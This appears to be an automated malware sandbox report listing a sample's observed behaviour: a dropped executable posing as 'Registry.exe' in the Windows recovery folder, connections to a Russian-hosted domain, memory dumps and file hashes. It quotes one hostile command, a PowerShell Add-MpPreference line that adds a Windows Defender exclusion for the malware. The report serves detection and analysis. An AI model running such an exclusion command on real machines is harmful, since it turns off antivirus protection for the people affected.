"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'
C:\Recovery\WindowsRE\Registry.exe
"C:\Recovery\WindowsRE\Registry.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a0913612.xsph.ru | udp |
| RU | 141.8.197.42:80 | a0913612.xsph.ru | tcp |
| RU | 141.8.197.42:80 | a0913612.xsph.ru | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.197.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.73.42.20.in-addr.arpa | udp |
Files
memory/4912-0-0x00007FFA94B33000-0x00007FFA94B35000-memory.dmp
memory/4912-1-0x00000000006F0000-0x00000000008EA000-memory.dmp
memory/4912-2-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp
memory/4912-3-0x0000000001160000-0x000000000116E000-memory.dmp
memory/4912-4-0x000000001B4F0000-0x000000001B4F8000-memory.dmp
memory/4912-5-0x000000001B520000-0x000000001B53C000-memory.dmp
memory/4912-6-0x000000001BBE0000-0x000000001BC30000-memory.dmp
memory/4912-8-0x000000001B540000-0x000000001B556000-memory.dmp
memory/4912-7-0x000000001B500000-0x000000001B510000-memory.dmp
memory/4912-9-0x000000001B560000-0x000000001B570000-memory.dmp
memory/4912-10-0x000000001B570000-0x000000001B57C000-memory.dmp
memory/4912-11-0x000000001BB90000-0x000000001BBA2000-memory.dmp
memory/4912-12-0x000000001C160000-0x000000001C688000-memory.dmp
memory/4912-13-0x000000001BBC0000-0x000000001BBCC000-memory.dmp
memory/4912-14-0x000000001BBD0000-0x000000001BBDC000-memory.dmp
memory/4912-15-0x000000001BD30000-0x000000001BD38000-memory.dmp
memory/4912-17-0x000000001BD40000-0x000000001BD4C000-memory.dmp
memory/4912-16-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp
memory/4912-20-0x000000001BE70000-0x000000001BE7E000-memory.dmp
memory/4912-19-0x000000001BE60000-0x000000001BE68000-memory.dmp
memory/4912-22-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp
memory/4912-21-0x000000001BE80000-0x000000001BE8C000-memory.dmp
memory/4912-23-0x000000001BE90000-0x000000001BE9A000-memory.dmp
memory/4912-18-0x000000001BD50000-0x000000001BD5E000-memory.dmp
memory/4912-24-0x000000001BEA0000-0x000000001BEAC000-memory.dmp
C:\Recovery\WindowsRE\Registry.exe
| MD5 | 2a0c47d8f5e14cfda0437c59c57fbce9 |
| SHA1 | a1c37d6d20049b2bc1a1db1d99b4f5b7fcd9c2b0 |
| SHA256 | 22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400 |
| SHA512 | 790702639348c58c99dcf4bd35d3b47bd544c7e4cd43fab90b5643f2917e3549e8e92a09d7aea3fed05766c086bdecdadf70c392289c46dc667e69cde73595d5 |
memory/868-165-0x00000219037D0000-0x00000219037F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4tcmvhop.m4a.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4912-258-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6c47b3f4e68eebd47e9332eebfd2dd4e |
| SHA1 | 67f0b143336d7db7b281ed3de5e877fa87261834 |
| SHA256 | 8c48b1f2338e5b24094821f41121d2221f1cb3200338f46df49f64d1c4bc3e0c |
| SHA512 | 0acf302a9fc971ef9df65ed42c47ea17828e54dff685f4434f360556fd27cdc26a75069f00dcdc14ba174893c6fd7a2cfd8c6c07be3ce35dafee0a006914eaca |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5f0ddc7f3691c81ee14d17b419ba220d |
| SHA1 | f0ef5fde8bab9d17c0b47137e014c91be888ee53 |
| SHA256 | a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5 |
| SHA512 | 2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 10e081d22e02f2f8d7ab5e3fb33079bb |
| SHA1 | 0eeaa68bb6ef9e2083860ac526e8c99b6659d90a |
| SHA256 | c31407b25ce1bd518a4540e44299000d97a3611422a90322c7979f997b1c1317 |
| SHA512 | 6094a4f9e8d6b00f0a8d96b5c1b8b7dd9d72ea942e247d374ed60b7e0116e9bff571d0ecc085c5c1b05e0868d251819f1c48eaf4444503db37c80c070ae98782 |